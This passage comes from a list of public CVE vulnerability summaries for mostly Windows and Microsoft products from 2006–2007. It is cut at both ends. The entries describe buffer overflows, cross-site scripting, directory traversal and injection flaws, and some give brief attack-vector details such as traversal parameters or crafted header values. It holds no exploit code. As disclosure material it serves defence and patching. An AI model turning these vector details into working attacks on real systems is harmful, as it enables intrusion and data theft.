Windows allows remote attackers to cause a denial of service via a crafted 802.11 management frame. [CVE-2007-2903] Buffer overflow in the HelpPopup method in the Microsoft Office 2000 Controllo UA di Microsoft Office ActiveX control (OUACTRL.OCX) 1.0.1.9 allows remote attackers to cause a denial of service (probably winhlp32.exe crash) via a long first argument. NOTE: it is not clear whether this issue crosses privilege boundaries. [CVE-2007-2897] Microsoft Internet Information Services (IIS) 6.0 allows remote attackers to cause a denial of service (server instability or device hang), and possibly obtain sensitive information (device communication traffic) [CVE-2007-2896] Race condition in the Symantec Enterprise Security Manager (ESM) 6.5.3 managers and agents on Windows before 20070524 allows remote attackers to cause a denial of service (CPU consumption and application hang) via certain network scans to ESM ports. [CVE-2007-2885] The NotSafe function in the MSVDTDatabaseDesigner7 ActiveX control in VDT70.DLL in Microsoft Visual Database Tools (MSVDT) Database Designer 7.0 allows remote attackers to cause a denial of service (Internet Explorer 6 crash) via a long argument. [CVE-2007-2884] Multiple stack-based buffer overflows in Microsoft Visual Basic 6 allow user-assisted remote attackers to cause a denial of service (CPU consumption) or execute arbitrary code via a Visual Basic Project (vbp) file with a long (1) Description or (2) Company Name (VersionCompanyName) field. [CVE-2007-2883] Credant Mobile Guardian Shield for Windows 5.2.1.105 and earlier stores account names and passwords in plaintext in memory, which allows local users to obtain sensitive information by (1) reading the paging file or (2) dumping and searching the memory image. NOTE: This issue crosses privilege boundaries because the product is intended to protect the data on a stolen computer. [CVE-2007-2809] Buffer overflow in the transfer manager in Opera before 9.21 for Windows allows user-assisted remote attackers to execute arbitrary code via a crafted torrent file. NOTE: due to the lack of details, it is not clear if this is the same issue as CVE-2007-2274. [CVE-2007-2718] Cross-site scripting (XSS) vulnerability in the WebMail system in Stalker CommuniGate Pro 5.1.8 and earlier, when using Microsoft Internet Explorer, allows remote attackers to inject arbitrary web script or HTML via crafted STYLE tags. [CVE-2007-2528] Buffer overflow in AgRpcCln.dll for Trend Micro ServerProtect 5.58 for Windows before Security Patch 3 Build 1176 allows remote attackers to execute arbitrary code via unknown vectors related to RPC requests. NOTE: this is probably a different vulnerability than CVE-2007-2508. [CVE-2007-2441] Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to obtain the system path via certain URLs associated with (1) deploying web applications or (2) displaying .xtp files. [CVE-2007-2440] Directory traversal vulnerability in Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to read certain files via a .. (dot dot) in a URI containing a "\web-inf" sequence. [CVE-2007-2439] Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to cause a denial of service (device hang) and read data from a COM or LPT device via a DOS device name with an arbitrary extension. [CVE-2007-2407] The Samba server on Apple Mac OS X 10.3.9 and 10.4.10, when Windows file sharing is enabled, does not enforce disk quotas after dropping privileges, which allows remote authenticated users to use disk space in excess of quota. [CVE-2007-2400] Race condition in Apple Safari 3 Beta before 3.0.2 on Mac OS X, Windows XP, Windows Vista, and iPhone before 1.0.1, allows remote attackers to bypass the JavaScript security model and modify pages outside of the security domain and conduct cross-site scripting (XSS) attacks via vectors related to page updating and HTTP redirects. [CVE-2007-2398] Apple Safari 3.0.1 beta (522.12.12) on Windows allows remote attackers to modify the window title and address bar while filling the main window with arbitrary content by setting the location bar and using setTimeout() to create an event that modifies the window content, which could facilitate phishing attacks. [CVE-2007-2391] Cross-site scripting (XSS) vulnerability in Apple Safari Beta 3.0.1 for Windows allows remote attackers to inject arbitrary web script or HTML via a web page that includes a windows.setTimeout function that is activated after the user has moved from the current page. [CVE-2007-2389] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not clear potentially sensitive memory before use, which allows remote attackers to read memory from a web browser via unknown vectors related to Java applets. [CVE-2007-2388] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not properly restrict QTObject subclassing, which allows remote attackers to execute arbitrary code via a web page containing a user-defined class that accesses unsafe functions that can be leveraged to write to arbitrary memory locations. [CVE-2007-2380] The Microsoft Atlas framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking." [CVE-2007-2344] The BOOTPD component in Enterasys NetSight Console 2.1 and NetSight Inventory Manager 2.1, and possibly earlier, on Windows allows remote attackers to cause a denial of service (daemon crash) via a UDP packet that contains an invalid "packet type" field. [CVE-2007-2291] CRLF injection vulnerability in the Digest Authentication support for Microsoft Internet Explorer 7.0.5730.11 allows remote attackers to conduct HTTP response splitting attacks via a LF (%0a) in the username attribute. [CVE-2007-2279] The Scheduler Service (VxSchedService.exe) in Symantec Storage Foundation for Windows 5.0 allows remote attackers to bypass authentication and execute arbitrary code via certain requests to the service socket that create (1) PreScript or (2) PostScript registry values under Veritas\VxSvc\CurrentVersion\Schedules specifying future command execution. [CVE-2007-2269] Directory traversal vulnerability in top.php3 in SWsoft Plesk for Windows 8.1 and 8.1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the locale_id parameter. [CVE-2007-2268] Multiple directory traversal vulnerabilities in SWsoft Plesk for Windows 7.6.1, 8.1.0, and 8.1.1 allow remote attackers to read arbitrary files via a .. (dot dot) in the locale_id parameter to (1) login.php3 or (2) login_up.php3. [CVE-2007-2238] Multiple stack-based buffer overflows in the Whale Client Components ActiveX control (WhlMgr.dll), as used in Microsoft Intelligent Application Gateway (IAG) before 3.7 SP2, allow remote attackers to execute arbitrary code via long arguments to the (1) CheckForUpdates or (2) UpdateComponents methods. [CVE-2007-2223] Microsoft XML Core Services (MSXML) 3.0 through 6.0 allows remote attackers to execute arbitrary code via the substringData method on a (1) TextNode or (2) XMLDOM object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2222] Multiple buffer overflows in the (1) ActiveListen (Xlisten.dll) and (2) ActiveVoice (Xvoice.dll) speech controls, as used by Microsoft Internet Explorer 5.01, 6, and 7, allow remote attackers to execute arbitrary code via a crafted ActiveX object that triggers memory corruption, as demonstrated via the ModeName parameter to the FindEngine function in ACTIVEVOICEPROJECTLib.DirectSS. [CVE-2007-2161] Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (browser hang) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)/. [CVE-2007-2137] Heap-based buffer overflow in kde.dll in IBM Tivoli Monitoring Express 6.1.0 before Fix Pack 2, as used in Tivoli Universal Agent, Windows OS Monitoring agent, and Enterprise Portal Server, allows remote attackers to execute arbitrary code by sending a long string to a certain TCP port. [CVE-2007-2110] Unspecified vulnerability in the Core RDBMS component for Oracle Database 9.0.1.5 and 10.1.0.4 on Windows systems has unknown impact and attack vectors, aka DB03. NOTE: as of 20070424, Oracle has not disputed reliable claims that DB03 occurs because RDBMS uses a NULL Discretionary Access Control List (DACL) for the Oracle process and certain shared memory sections, which allows local users to inject threads and execute arbitrary code via the OpenProcess, OpenThread, and SetThreadContext functions (DB03). [CVE-2007-2108] Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.2 on Windows allows remote attackers to have an unknown impact, aka DB01. NOTE: as of 20070424, Oracle has not disputed reliable claims that this issue occurs because the NTLM SSPI AcceptSecurityContext function grants privileges based on the username provided even though all users are authenticated as Guest, which allows remote attackers to gain privileges. [CVE-2007-2080] Multiple SQL injection vulnerabilities in XAMPP 1.6.0a for Windows allow remote attackers to execute arbitrary SQL commands via unspecified vectors in certain test scripts. [CVE-2007-2079] The ADONewConnection Connect function in adodb.php in XAMPP 1.6.0a and earlier for Windows uses untrusted input for the database server hostname, which allows remote attackers to trigger a library buffer overflow and execute arbitrary code via a long host parameter, or have other unspecified impact. NOTE: it could be argued that this is an issue in mssql_connect (CVE-2007-1411.1) in PHP, or an issue in the ADOdb Library, and the proper fix should be in one of these products [CVE-2007-1981] The safevoid_vsnprintf function in Metamod-P 1.19p29 and earlier on Windows allows remote attackers to cause a denial of service (daemon crash) via a long meta list command. [CVE-2007-1911] Multiple unspecified vulnerabilities in Microsoft Word 2007 allow remote attackers to cause a denial of service (CPU consumption) via crafted documents, as demonstrated by (1) file798-1.doc and (2) file613-1.doc, possibly related to a buffer overflow. [CVE-2007-1910] Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted document, as demonstrated by file789-1.doc. [CVE-2007-1876] VMware Workstation before 5.5.4, when running a 64-bit Windows guest on a 64-bit host, allows local users to "corrupt the virtual machine's register context" by debugging a local program and stepping into a "syscall instruction." [CVE-2007-1756] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, and Office Excel 2007 does not properly validate version information, which allows user-assisted remote attackers to execute arbitrary code via a crafted Excel file, aka "Calculation Error Vulnerability". [CVE-2007-1754] PUBCONV.DLL in Microsoft Office Publisher 2007 does not properly clear memory when transferring data from disk to memory, which allows user-assisted remote attackers to execute arbitrary code via a malformed .pub page via a certain negative value, which bypasses a sanitization procedure that initializes critical pointers to NULL, aka the "Publisher Invalid Memory Reference Vulnerability". [CVE-2007-1751] Microsoft Internet Explorer 5.01, 6, and 7 allows remote attackers to execute arbitrary code by causing Internet Explorer to access an uninitialized or deleted object, related to prototype variables and table cells, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2007-1750] Unspecified vulnerability in Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code via a crafted Cascading Style Sheets (CSS) tag that triggers memory corruption. [CVE-2007-1747] Unspecified vulnerability in MSO.dll in Microsoft Office 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and 2007 allows user-assisted remote attackers to execute arbitrary code via a malformed drawing object, which triggers memory corruption. [CVE-2007-1593] The administrative service in Symantec Veritas Volume Replicator (VVR) for Windows 3.1 through 4.3, and VVR for Unix 3.5 through 5.0, in Symantec Storage Foundation products allows remote attackers to cause a denial of service (memory consumption and service crash) via a crafted packet to the service port (8199/tcp) that triggers a request for more memory than available, which causes the service to write to an invalid pointer. [CVE-2007-1580] FTPDMIN 0.96 allows remote attackers to cause a denial of service (daemon crash) via a LIST command for a Windows drive letter, as demonstrated using "//A:". NOTE: this has been reported as a buffer overflow by some sources, but there is not a long argument. [CVE-2007-1538] * DISPUTED McAfee VirusScan Enterprise 8.5.0.i uses insecure permissions for certain Windows Registry keys, which allows local users to bypass local password protection via the UIP value in (1) HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection or (2) HKEY_LOCAL_MACHINE\SOFTWARE\Network Associates\TVD\VirusScan Entreprise\CurrentVersion. NOTE: this issue has been disputed by third-party researchers, stating that the default permissions for HKEY_LOCAL_MACHINE\SOFTWARE does not allow for write access and the product does not modify the inherited permissions. There might be an interaction error with another product. [CVE-2007-1405] Cross-site scripting (XSS) vulnerability in the "download wiki page as text" feature in Trac before 0.10.3.1, when Microsoft Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2007-1382] The PHP COM extensions for PHP on Windows systems allow context-dependent attackers to execute arbitrary code via a WScript.Shell COM object, as demonstrated by using the Run method of this object to execute cmd.exe, which bypasses PHP's safe mode. [CVE-2007-1281] Kaspersky AntiVirus Engine 6.0.1.411 for Windows and 5.5-10 for Linux allows remote attackers to cause a denial of service (CPU consumption) via a crafted UPX compressed file with a negative offset, which triggers an infinite loop during decompression. [CVE-2007-1278] Unspecified vulnerability in the IIS connector in Adobe JRun 4.0 Updater 6, and ColdFusion MX 6.1 and 7.0 Enterprise, when using Microsoft IIS 6, allows remote attackers to cause a denial of service via unspecified vectors, involving the request of a file in the JRun web root. [CVE-2007-1262] Multiple cross-site scripting (XSS) vulnerabilities in the HTML filter in SquirrelMail 1.4.0 through 1.4.9a allow remote attackers to inject arbitrary web script or HTML via the (1) data: URI in an HTML e-mail attachment or (2) various non-ASCII character sets that are not properly filtered when viewed with Microsoft Internet Explorer. [CVE-2007-1239] Microsoft Excel 2003 does not properly parse .XLS files, which allows remote attackers to cause a denial of service (application crash) via a file with a (1) corrupted XML format or a (2) corrupted XLS format, which triggers a NULL pointer dereference. [CVE-2007-1238] Microsoft Office 2003 allows user-assisted remote attackers to cause a denial of service (application crash) by attempting to insert a corrupted WMF file. [CVE-2007-1221] The Hypervisor in Microsoft Xbox 360 kernel 4532 and 4548 allows attackers with physical access to force execution of the hypervisor syscall with a certain register set, which bypasses intended code protection. [CVE-2007-1220] The Hypervisor in Microsoft Xbox 360 kernel 4532 and 4548 does not properly verify the parameters passed to the syscall dispatcher, which allows attackers with physical access to bypass code-signing requirements and execute arbitrary code. [CVE-2007-1214] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, and 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a crafted AutoFilter filter record in an Excel BIFF8 format XLS file, which triggers memory corruption. [CVE-2007-1203] Unspecified vulnerability in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2003 Viewer, 2004 for Mac, and 2007 allows user-assisted remote attackers to execute arbitrary code via a crafted set font value in an Excel file, which results in memory corruption. [CVE-2007-1202] Word (or Word Viewer) in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, 2004 for Mac, and Works Suite 2004, 2005, and 2006 does not properly parse certain rich text "property strings of certain control words," which allows user-assisted remote attackers to trigger heap corruption and execute arbitrary code, aka the "Word RTF Parsing Vulnerability." [CVE-2007-1201] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via vectors related to DataSource that trigger memory corruption, aka "Office Web Components DataSource Vulnerability." [CVE-2007-1196] Unspecified vulnerability in Citrix Presentation Server Client for Windows before 10.0 allows remote web sites to execute arbitrary code via unspecified vectors, related to the implementation of ICA connectivity through proxy servers. [CVE-2007-1117] Unspecified vulnerability in Publisher 2007 in Microsoft Office 2007 allows remote attackers to execute arbitrary code via unspecified vectors, related to a "file format vulnerability." NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-1114] The child frames in Microsoft Internet Explorer 7 inherit the default charset from the parent window when a charset is not specified in an HTTP Content-Type header or META tag, which allows remote attackers to conduct cross-site scripting (XSS) attacks, as demonstrated using the UTF-7 character set. [CVE-2007-1094] Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (NULL dereference and application crash) via JavaScript onUnload handlers that modify the structure of a document. [CVE-2007-1091] Microsoft Internet Explorer 7 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via onUnload Javascript handlers. [CVE-2007-1083] Buffer overflow in the Configuration Checker (ConfigChk) ActiveX control in VSCnfChk.dll 2.0.0.2 for Verisign Managed PKI Service, Secure Messaging for Microsoft Exchange, and Go Secure! allows remote attackers to execute arbitrary code via long arguments to the VerCompare method. [CVE-2007-1070] Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll. [CVE-2007-1069] The memory management in VMware Workstation before 5.5.4 allows attackers to cause a denial of service (Windows virtual machine crash) by triggering certain general protection faults (GPF). [CVE-2007-0948] Heap-based buffer overflow in Microsoft Virtual PC 2004 and PC for Mac 7.1 and 7, and Virtual Server 2005 and 2005 R2, allows local guest OS administrators to execute arbitrary code on the host OS via unspecified vectors related to "interaction and initialization of components." [CVE-2007-0940] Unspecified vulnerability in the Cryptographic API Component Object Model Certificates ActiveX control (CAPICOM.dll) in Microsoft CAPICOM and BizTalk Server 2004 SP1 and SP2 allows remote attackers to execute arbitrary code via unspecified vectors, aka the "CAPICOM.Certificates Vulnerability." [CVE-2007-0939] Cross-site scripting (XSS) vulnerability in Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving HTML redirection queries, aka "Cross-site Scripting and Spoofing Vulnerability." [CVE-2007-0938] Microsoft Content Management Server (MCMS) 2001 SP1 and 2002 SP2 does not properly handle certain characters in a crafted HTTP GET request, which allows remote attackers to execute arbitrary code, aka the "CMS Memory Corruption Vulnerability." [CVE-2007-0936] Multiple unspecified vulnerabilities in Microsoft Visio 2002 allow remote user-assisted attackers to execute arbitrary code via a Visio (.VSD, VSS, .VST) file with a crafted packed object that triggers memory corruption, aka "Visio Document Packaging Vulnerability." [CVE-2007-0934] Unspecified vulnerability in Microsoft Visio 2002 allows remote user-assisted attackers to execute arbitrary code via a Visio (.VSD, VSS, .VST) file with a crafted version number that triggers memory corruption. [CVE-2007-0933] Buffer overflow in the wireless driver 6.0.0.18 for D-Link DWL-G650+ (Rev. A1) on Windows XP allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a beacon frame with a long TIM Information Element. [CVE-2007-0913] Unspecified vulnerability in Microsoft Powerpoint allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as exploited by Trojan.PPDropper.G. NOTE: as of 20070213, it is not clear whether this is the same issue as CVE-2006-5296, CVE-2006-4694, CVE-2006-3876, CVE-2006-3877, or older issues. [CVE-2007-0870] Unspecified vulnerability in Microsoft Word 2000 allows remote attackers to cause a denial of service (crash) via unknown vectors, a different vulnerability than CVE-2006-5994, CVE-2006-6456, CVE-2006-6561, and CVE-2007-0515, a variant of Exploit-MS06-027. [CVE-2007-0842] The 64-bit versions of Microsoft Visual C++ 8.0 standard library (MSVCR80.DLL) time functions, including (1) localtime, (2) localtime_s, (3) gmtime, (4) gmtime_s, (5) ctime, (6) ctime_s, (7) wctime, (8) wctime_s, and (9) fstat, trigger an assertion error instead of a NULL pointer or EINVAL when processing a time argument later than Jan 1, 3000, which might allow context-dependent attackers to cause a denial of service (application exit) via large time values. NOTE: it could be argued that this is a design limitation of the functions, and the vulnerability lies with any application that does not validate arguments to these functions. However, this behavior is inconsistent with documentation, which does not list assertions as a possible result of an error condition. [CVE-2007-0780] browser.js in Mozilla Firefox 1.5.x before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8 uses the requesting URI to identify child windows, which allows remote attackers to conduct cross-site scripting (XSS) attacks by opening a blocked popup originating from a javascript: URI in combination with multiple frames having the same data: URI. [CVE-2007-0711] Integer overflow in Apple QuickTime before 7.1.5, when installed on Windows operating systems, allows remote user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted 3GP video file. [CVE-2007-0685] Internet Explorer on Windows Mobile 5.0 and Windows Mobile 2003 and 2003SE for Smartphones and PocketPC allows attackers to cause a denial of service (application crash and device instability) via unspecified vectors, possibly related to a buffer overflow. [CVE-2007-0678] SQL injection vulnerability in windows.asp in Fullaspsite Asp Hosting Sitesi allows remote attackers to execute arbitrary SQL commands via the kategori_id parameter. [CVE-2007-0674] Pictures and Videos on Windows Mobile 5.0 and Windows Mobile 2003 and 2003SE for Smartphones and PocketPC allows user-assisted remote attackers to cause a denial of service (device hang) via a malformed JPEG file. [CVE-2007-0671] Unspecified vulnerability in Microsoft Excel 2000, XP, 2003, and 2004 for Mac, and possibly other Office products, allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as demonstrated by Exploit-MSExcel.h in targeted zero-day attacks. [CVE-2007-0515] Unspecified vulnerability in Microsoft Word allows user-assisted remote attackers to execute arbitrary code on Word 2000, and cause a denial of service on Word 2003, via unknown attack vectors that trigger memory corruption, as exploited by Trojan.Mdropper.W and later by Trojan.Mdropper.X, a different issue than CVE-2006-6456, CVE-2006-5994, and CVE-2006-6561. [CVE-2007-0468] Stack-based buffer overflow in rcdll.dll in msdev.exe in Visual C++ (MSVC) in Microsoft Visual Studio 6.0 SP6 allows user-assisted remote attackers to execute arbitrary code via a long file path in the "1 TYPELIB MOVEABLE PURE" option in an RC file. [CVE-2007-0466] Telestream Flip4Mac Windows Media Components for Quicktime 2.1.0.33 allows remote attackers to execute arbitrary code via a crafted ASF_File_Properties_Object size field in a WMV file, which triggers memory corruption. [CVE-2007-0454] Format string vulnerability in the afsacl.so VFS module in Samba 3.0.6 through 3.0.23d allows context-dependent attackers to execute arbitrary code via format string specifiers in a filename on an AFS file system, which is not properly handled during Windows ACL mapping. [CVE-2007-0427] Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a help project (.HPJ) file with a long HLP field in the OPTIONS section. [CVE-2007-0352] Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a crafted .cnt file composed of lines that begin with an integer followed by a space and a long string. [CVE-2007-0341] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.1 and earlier, when Microsoft Internet Explorer 6 is used, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a CSS style in the convcharset parameter to the top-level URI, a different vulnerability than CVE-2005-0992. [CVE-2007-0221] Integer overflow in the IMAP (IMAP4) support in Microsoft Exchange Server 2000 SP3 allows remote attackers to cause a denial of service (service hang) via crafted literals in an IMAP command, aka the "IMAP Literal Processing Vulnerability." [CVE-2007-0220] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) in Microsoft Exchange Server 2000 SP3, and 2003 SP1 and SP2 allows remote attackers to execute arbitrary scripts, spoof content, or obtain sensitive information via certain UTF-encoded, script-based e-mail attachments, involving an "incorrectly handled UTF character set label". [CVE-2007-0219] Microsoft Internet Explorer 5.01, 6, and 7 uses certain COM objects from (1) Msb1fren.dll, (2) Htmlmm.ocx, and (3) Blnmgrps.dll as ActiveX controls, which allows remote attackers to execute arbitrary code via unspecified vectors, a different issue than CVE-2006-4697. [CVE-2007-0218] Microsoft Internet Explorer 5.01 and 6 allows remote attackers to execute arbitrary code by instantiating certain COM objects from Urlmon.dll, which triggers memory corruption during a call to the IObjectSafety function. [CVE-2007-0217] The wininet.dll FTP client code in Microsoft Internet Explorer 5.01 and 6 might allow remote attackers to execute arbitrary code via an FTP server response of a specific length that causes a terminating null byte to be written outside of a buffer, which causes heap corruption. [CVE-2007-0216] wkcvqd01.dll in Microsoft Works 6 File Converter, as used in Office 2003 SP2, Works 8.0, and Works Suite 2005, allows remote attackers to execute arbitrary code via a .wps file with crafted section length headers, aka "Microsoft Works File Converter Input Validation Vulnerability." [CVE-2007-0215] Stack-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, and 2003 Viewer allows user-assisted remote attackers to execute arbitrary code via a .XLS BIFF file with a malformed Named Graph record, which results in memory corruption. [CVE-2007-0213] Microsoft Exchange Server 2000 SP3, 2003 SP1 and SP2, and 2007 does not properly decode certain MIME encoded e-mails, which allows remote attackers to execute arbitrary code via a crafted base64-encoded MIME e-mail message. [CVE-2007-0209] Microsoft Word in Office 2000 SP3, XP SP3, Office 2003 SP2, Works Suite 2004 to 2006, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via a Word file with a malformed drawing object, which leads to memory corruption. [CVE-2007-0208] Microsoft Word in Office 2000 SP3, XP SP3, Office 2003 SP2, Works Suite 2004 to 2006, and Office 2004 for Mac does not correctly check the properties of certain documents and warn the user of macro content, which allows user-assisted remote attackers to execute arbitrary code. [CVE-2007-0125] Kaspersky Labs Antivirus Engine 6.0 for Windows and 5.5-10 for Linux before 20070102 enter an infinite loop upon encountering an invalid NumberOfRvaAndSizes value in the Optional Windows Header of a portable executable (PE) file, which allows remote attackers to cause a denial of service (CPU consumption) by scanning a crafted PE file. [CVE-2007-0111] Buffer overflow in Resco Photo Viewer for PocketPC 4.11 and 6.01, as used in mobile devices running Windows Mobile 5.0, 2003, and 2003SE, allows remote attackers to execute arbitrary code via a crafted PNG image. [CVE-2007-0108] nwgina.dll in Novell Client 4.91 SP3 for Windows 2000/XP/2003 does not delete user profiles during a Terminal Service or Citrix session, which allows remote authenticated users to invoke alternate user profiles. [CVE-2007-0105] Stack-based buffer overflow in the CSAdmin service in Cisco Secure Access Control Server (ACS) for Windows before 4.1 and ACS Solution Engine before 4.1 allows remote attackers to execute arbitrary code via a crafted HTTP GET request. [CVE-2007-0099] Race condition in the msxml3 module in Microsoft XML Core Services 3.0, as used in Internet Explorer 6 and other applications, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via many nested tags in an XML document in an IFRAME, when synchronous document rendering is frequently disrupted with asynchronous events, as demonstrated using a JavaScript timer, which can trigger NULL pointer dereferences or memory corruption, aka "MSXML Memory Corruption Vulnerability." [CVE-2007-0087] DISPUTED ** Microsoft Internet Information Services (IIS), when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal. [CVE-2007-0060] Stack-based buffer overflow in the Message Queuing Server (Cam.exe) in CA (formerly Computer Associates) Message Queuing (CAM / CAFT) software before 1.11 Build 54_4 on Windows and NetWare, as used in CA Advantage Data Transport, eTrust Admin, certain BrightStor products, certain CleverPath products, and certain Unicenter products, allows remote attackers to execute arbitrary code via a crafted message to TCP port 3104. [CVE-2007-0047] CRLF injection vulnerability in Adobe Acrobat Reader Plugin before 8.0.0, when used with the Microsoft.XMLHTTP ActiveX object in Internet Explorer, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the javascript: URI in the (1) FDF, (2) XML, or (3) XFDF AJAX request parameters. [CVE-2007-0039] The Exchange Collaboration Data Objects (EXCDO) functionality in Microsoft Exchange Server 2000 SP3, 2003 SP1 and SP2, and 2007 allows remote attackers to cause a denial of service (crash) via an Internet Calendar (iCal) file containing multiple X-MICROSOFT-CDO-MODPROPS (MODPROPS) properties in which the second MODPROPS is longer than the first, which triggers a NULL pointer dereference and an unhandled exception. [CVE-2007-0035] Word (or Word Viewer) in Microsoft Office 2000 SP3, XP SP3, 2003 SP2, 2004 for Mac, and Works Suite 2004, 2005, and 2006 does not properly handle data in a certain array, which allows user-assisted remote attackers to execute arbitrary code, aka the "Word Array Overflow Vulnerability." [CVE-2007-0034] Buffer overflow in the Advanced Search (Finder.exe) feature of Microsoft Outlook 2000, 2002, and 2003 allows user-assisted remote attackers to execute arbitrary code via a crafted Outlook Saved Searches (OSS) file that triggers memory corruption, aka "Microsoft Outlook Advanced Find Vulnerability." [CVE-2007-0033] Microsoft Outlook 2002 and 2003 allows user-assisted remote attackers to execute arbitrary code via a malformed VEVENT record in an .iCal meeting request or ICS file. [CVE-2007-0031] Heap-based buffer overflow in Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via a BIFF8 spreadsheet with a PALETTE record that contains a large number of entries. [CVE-2007-0030] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via an Excel file with an out-of-range Column field in certain BIFF8 record types, which references arbitrary memory. [CVE-2007-0029] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows user-assisted remote attackers to execute arbitrary code via a malformed string, aka "Excel Malformed String Vulnerability." [CVE-2007-0028] Microsoft Excel 2000, 2002, 2003, Viewer 2003, Office 2004 for Mac, and Office v.X for Mac does not properly handle certain opcodes, which allows user-assisted remote attackers to execute arbitrary code via a crafted XLS file, which results in an "Improper Memory Access Vulnerability." NOTE: an early disclosure of this issue used CVE-2006-3432, but only CVE-2007-0028 should be used. [CVE-2007-0027] Microsoft Excel 2000 SP3, 2002 SP3, 2003 SP2, 2004 for Mac, and v.X for Mac allows remote attackers to execute arbitrary code via malformed IMDATA records that trigger memory corruption. [CVE-2006-7192] Microsoft ASP .NET Framework 2.0.50727.42 does not properly handle comment (/* /) enclosures, which allows remote attackers to bypass request filtering and conduct cross-site scripting (XSS) attacks, or cause a denial of service, as demonstrated via an xss:expression STYLE attribute in a closing XSS HTML tag. [CVE-2006-7065] Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via an IFRAME with a certain XML file and XSL stylesheet that triggers a crash in mshtml.dll when a refresh is called, probably a null pointer dereference. [CVE-2006-7031] Microsoft Internet Explorer 6.0.2900 SP2 and earlier allows remote attackers to cause a denial of service (crash) via a table element with a CSS attribute that sets the position, which triggers an "unhandled exception" in mshtml.dll. [CVE-2006-7030] Microsoft Internet Explorer 6 SP2 and earlier allows remote attackers to cause a denial of service (crash) via certain malformed HTML, possibly involving applet and base tags without required arguments, which triggers a null pointer dereference in mshtml.dll. [CVE-2006-7029] Microsoft Internet Explorer 6 SP2 and earlier allows remote attackers to cause a denial of service (crash) via a frameset with only one frame that calls resizeTo with certain arguments. NOTE: this issue might be related to CVE-2006-3637. [CVE-2006-7027] Microsoft Internet Security and Acceleration (ISA) Server 2004 logs unusual ASCII characters in the Host header, including the tab, which allows remote attackers to manipulate portions of the log file and possibly leverage this for other attacks. [CVE-2006-6971] Mozilla Firefox 2.0, possibly only when running on Windows, allows remote attackers to bypass the Phishing Protection mechanism by representing an IP address in (1) dotted-hex, (2) dotted-octal, (3) single decimal integer, (4) single hex integer, or (5) single octal integer format, which is not captured by the blacklist filter. [CVE-2006-6956] Microsoft Internet Explorer allows remote attackers to cause a denial of service (crash) via a web page that contains a large number of nested marquee tags, a related issue to CVE-2006-2723. [CVE-2006-6908] Buffer overflow in the Bluetooth Stack COM Server in the Widcomm Bluetooth stack, as packaged as Widcomm Stack 3.x and earlier on Windows, Widcomm BTStackServer 1.4.2.10 and 1.3.2.7 